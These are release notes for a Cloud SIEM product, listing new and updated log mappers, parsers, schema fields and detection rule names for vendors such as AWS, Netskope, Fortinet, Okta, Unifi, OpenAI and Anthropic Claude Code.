• Expanded AWS CloudWatch and IAM logging with improved identity field mapping, timestamp parsing, and resource tracking.
• Parser enhancements for Imperva Incapsula (cslabel field support) and Infoblox (new log format support).
• New schema fields for grandparent process tracking to improve visibility into process execution chains.

Additional changes are enumerated below.

Log Mappers​

• [New] CloudTrail - bedrock.amazonaws.com - DeleteKnowledgeBase
• [Updated] AWS CloudWatch Custom
• [Updated] CloudTrail - iam.amazonaws.com - Policy Change
• [Updated] Microsoft O365 Exchange Message Trace C2C
• [Updated] Netskope - Alerts
• [Updated] Netskope - Anomaly - Bulk Download
• [Updated] Netskope - Anomaly - User Shared Credentials
• [Updated] Netskope - Application Events
• [Updated] Netskope - Audit Authentication Events - Logoff
• [Updated] Netskope - Audit Authentication Events - Logon
• [Updated] Netskope - Audit Events
• [Updated] Netskope - Catch All
• [Updated] Netskope - DLP Alerts
• [Updated] Netskope - Incidents
• [Updated] Netskope - Network Events
• [Updated] Netskope - Page Events
• [Updated] Netskope - nspolicy

Parsers​

• [Updated] /Parsers/System/AWS/AWS CloudWatch
• [Updated] /Parsers/System/Imperva/Imperva Incapsula
• [Updated] /Parsers/System/Infoblox/Infoblox
• [Updated] /Parsers/System/Netskope/Netskope Security Cloud JSON
• [Updated] /Parsers/System/Microsoft/O365 Exchange Message Trace C2C

Schema​

• [New] grandparentBaseImage
• [New] grandparentCommandLine
• [New] grandparentPid

This content release includes:

• New support for Proofpoint TRAP threat response and Teleport access management.
• Improved Fortinet traffic visibility with additional byte count field mappings across application control, traffic, and web filter logs.
• Enhanced Microsoft Office 365 authentication event normalization for action and cause fields.
• Infoblox DHCP log parsing improvements for broader log format coverage.

Additional changes are enumerated below.

Log Mappers​

• [New] Proofpoint TRAP Default Mapping
• [New] Teleport Authentication
• [New] Teleport Default
• [Updated] Fortinet Appctrl1
• [Updated] Fortinet Traffic Logs
• [Updated] Fortinet Traffic1
• [Updated] Fortinet Traffic2
• [Updated] Fortinet Webfilter Logs
• [Updated] Microsoft Office 365 Active Directory Authentication Events

Parsers​

• [New] /Parsers/System/Proofpoint/Proofpoint TRAP
• [New] /Parsers/System/Teleport/Teleport
• [Updated] /Parsers/System/Infoblox/Infoblox

This content release includes:

• New Cloudflare DNS event visibility with a dedicated log mapper and enhanced parser support for DNS query logging.
• Improved Infoblox DHCP event handling with updated field mappings and additional timestamp format support.
• Refined detection logic for Office 365 MailItemsAccessed events. Now using global baselines for more accurate first-seen analysis.
• Performance optimization for Windows critical service monitoring rule.

Additional changes are enumerated below.

Rules​

• [Updated] FIRST-S00044 First Seen AppID Generating MailItemsAccessed Event from User
• [Updated] MATCH-S00521 Windows - Critical Service Disabled via Command Line

Log Mappers​

• [New] Cloudflare - DNS Events
• [Updated] Infoblox DDI - DHCP

Parsers​

• [Updated] /Parsers/System/Cisco/Cisco ASA
• [Updated] /Parsers/System/Cloudflare/Cloudflare Logpush
• [Updated] /Parsers/System/Infoblox/Infoblox
• [Updated] /Parsers/System/Linux/Linux OS Syslog

• This content release includes:
  • Added MITRE ATLAS Tactics and Techniques to tag schema for improved attack pattern classification and detection rule development.
  • Expanded Ubiquiti Unifi network visibility with 7 new log mappers and parser enhancements covering process execution, DHCP events, DNS queries, and general network traffic.
  • Enhanced field mappings and parsing for email security, web traffic analysis, and authentication monitoring:
    • Abnormal Security threat detection now captures email metadata, sender/recipient details, and threat categorization.
    • Netskope web transactions include network connection details, file hashes, and error context.
    • Okta Active Directory authentication events provide standardized user identification.

Additional changes are enumerated below.

Log Mappers​

• [New] Unifi - Process Cron - Command Execution
• [New] Unifi - Process sudo - Superuser Do Command Execution
• [New] Unifi DHCP ACK Event
• [New] Unifi DHCP Offer Event
• [New] Unifi DHCP Request and DHCP DISCOVER Event
• [New] Unifi DNS Network Event
• [New] Unifi Network Event
• [Updated] Abnormal Security Threats
• [Updated] Netskope - WebTx Events
• [Updated] Okta Authentication - auth_via_AD_agent
• [Updated] Unifi Catch All
• [Updated] Unifi HTTP Request Logs

Parsers​

• [Updated] /Parsers/System/Abnormal Security/Abnormal Security
• [Updated] /Parsers/System/Netskope/Netskope WebTx
• [Updated] /Parsers/System/Okta/Okta
• [Updated] /Parsers/System/Ubiquiti/Ubiquiti Unifi

Bulk update insights​

We're happy to announce that you can use the UI or API to update multiple insights at a time, including closing, reassigning, adding comments, or giving them a new status. Acting on multiple insights at once speeds up your insight resolution. Learn more.

This content release includes:

• New support for OpenAI and Anthropic Claude Code audit logging to monitor AI platform usage, API key lifecycle, and organizational access.
• New support for Akamai Noname API Security threat detection and analysis.
• Enhanced CrowdStrike Falcon detection coverage including XDR events, automated lead summaries, and data protection alerts.
• Standardized device IP field mappings across Cisco ASA log mappers for improved asset correlation.

Additional changes are enumerated below.

Rules​

• [Updated] MATCH-S00521 Windows - Critical Service Disabled via Command Line. Updated detection expression for improved query performance.

Log Mappers​

• [New] Akamai Noname API Security Insight Log
• [New] Anthropic Claude Code - api_request|api_error|user_prompt|tool_result|tool_decision
• [New] Anthropic Claude Code Catch All
• [New] CrowdStrike Alert - All Detections
• [New] CrowdStrike Falcon - AutomatedLeadSummaryEvent|XdrDetectionSummaryEvent
• [New] CrowdStrike Falcon - DataProtectionDetectionSummaryEvent
• [New] OpenAI Audit - API Key Events
• [New] OpenAI Audit - Invite Events
• [New] OpenAI Audit - Login Events
• [New] OpenAI Audit - Organization Events
• [New] OpenAI Audit - Project Events
• [New] OpenAI Audit - Role Assignment Events
• [New] OpenAI Audit - Role Events
• [New] OpenAI Audit - Service Account Events
• [New] OpenAI Audit - User Management Events
• [New] OpenAI Audit - Workflow Events
• [New] OpenAI Audit Catch All
• [Updated] Cisco ASA 106001 JSON
• [Updated] Cisco ASA 106102-3 JSON
• [Updated] Cisco ASA 109201|109207|113022
• [Updated] Cisco ASA 4180(18|19|44)
• [Updated] Cisco ASA 609002 JSON
• [Updated] Cisco ASA 713172 JSON
• [Updated] Cisco ASA 713nnn JSON
• [Updated] Cisco ASA 716039 JSON
• [Updated] Cisco ASA 716059 JSON
• [Updated] Cisco ASA 725016|771002
• [Updated] Cisco ASA 733100|734001|737005|737017|737036|737029|746014|746015|746016 JSON
• [Updated] Cisco Umbrella DNS Logs
• [Updated] Unifi HTTP Request Logs

Parsers​

• [New] /Parsers/System/Akamai/Noname API Security
• [New] /Parsers/System/Anthropic/Claude Code
• [New] /Parsers/System/OpenAI/OpenAI Audit
• [Updated] /Parsers/System/Cisco/Cisco ASA
• [Updated] /Parsers/System/CrowdStrike/CrowdStrike Falcon Endpoint - JSON

This content release includes:

• New parsing and mapping support for Ubiquiti Unifi.
• Updates to Infoblox DDI and NIOS log mappers and parsers to extract and map hostname, IP, port, and MAC address fields.
• Updates to Check Point Firewall Syslog parser to improve user extraction.
• Update to Netskope Security Cloud JSON parser to add a static alert name in the absence of specific alert name data.

Log Mappers​

• [New] Unifi Catch All
• [New] Unifi Http Request Logs
• [New] Unifi Traffic Logs
• [Updated] Infoblox DDI - Catch All
• [Updated] Infoblox DDI - DHCP
• [Updated] Infoblox DDI - DNS
• [Updated] Infoblox NIOS - Catch All
• [Updated] Infoblox NIOS - DHCP
• [Updated] Infoblox NIOS - DNS

Parsers​

• [New] /Parsers/System/Ubiquiti/Ubiquiti Unifi
• [Updated] /Parsers/System/Check Point/Check Point Firewall Syslog
• [Updated] /Parsers/System/Infoblox/Infoblox
• [Updated] /Parsers/System/Netskope/Netskope Security Cloud JSON

This release adds support for OCSF 1.6 and Netskope WebTx logs. Changes are enumerated below.

Rules​

• [New] MATCH-S01148 OCSF IAM Analysis Finding
  • Passes through IAM analysis findings from OCSF conforming sources.
• [Updated] MATCH-S00445 Known Ransomware File Extensions
  • Corrects spelling in rule description.

Log Mappers​

• [Updated] Netskope - WebTx Events

Parsers​

• [New] /Parsers/System/Netskope/Netskope WebTx

This content release includes:

• Rule update.
• New parsing and mapping support for VMware vSphere Web Services.
• Updates to Fortinet parsing and mapping to better capture inbound and outbound traffic bytes and packets.
• Updates to Okta mapping to standardize srcDevice_ip mappings.

Changes are enumerated below.

Rules​

• [Updated] FIRST-S00067 Okta - First Seen Client ID/ASN combo in successful OIDC token grant
  • Added exclusion to rule expression to exclude consideration of null values in baseline.

Log Mappers​

• [New] Check Point Anti Malware
• [New] Check Point New Anti Virus
• [New] vSphere Web Services - Login/Logout
• [New] vSphere Web Services - default
• [Updated] Cisco ASA 722051|722022|722023|722028|722032|722033|722036|722037|722041|722011
  • Update to parser and mapper to correctly capture IP directionality.
• [Updated] Fortinet Appctrl1
• [Updated] Fortinet Traffic Logs
• [Updated] Fortinet Traffic Syslog 1
• [Updated] Fortinet Traffic1
• [Updated] Fortinet Traffic2
• [Updated] Fortinet Webfilter Logs
• [Updated] Okta Authentication - auth_via_AD_agent
• [Updated] Okta Authentication - auth_via_mfa
• [Updated] Okta Authentication - auth_via_radius
• [Updated] Okta Authentication - sso
• [Updated] Okta Authentication Events
• [Updated] Okta Catch All
• [Updated] Okta Security Threat Events
• [Updated] Oracle Cloud Infrastructure Audit Catch All
  • Update to mapper to correctly capture source IP address.

Parsers​

• [New] /Parsers/System/VMware/vSphere Web Services
• [Updated] /Parsers/System/Check Point/Check Point Firewall Syslog
• [Updated] /Parsers/System/Cisco/Cisco ASA
• [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-JSON

This is an archive of 2025 Cloud SIEM release notes. To view the full archive, click here. Release notes are available on our website for a rolling multi-year period. For information about older releases, contact Support.

This is an archive of 2024 Cloud SIEM release notes. To view the full archive, click here. Release notes are available on our website for a rolling multi-year period. For information about older releases, contact Support.

This is an archive of 2023 Cloud SIEM release notes. To view the full archive, click here. Release notes are available on our website for a rolling multi-year period. For information about older releases, contact Support.

This is an archive of 2022 Cloud SIEM release notes. To view the full archive, click here. Release notes are available on our website for a rolling multi-year period. For information about older releases, contact Support.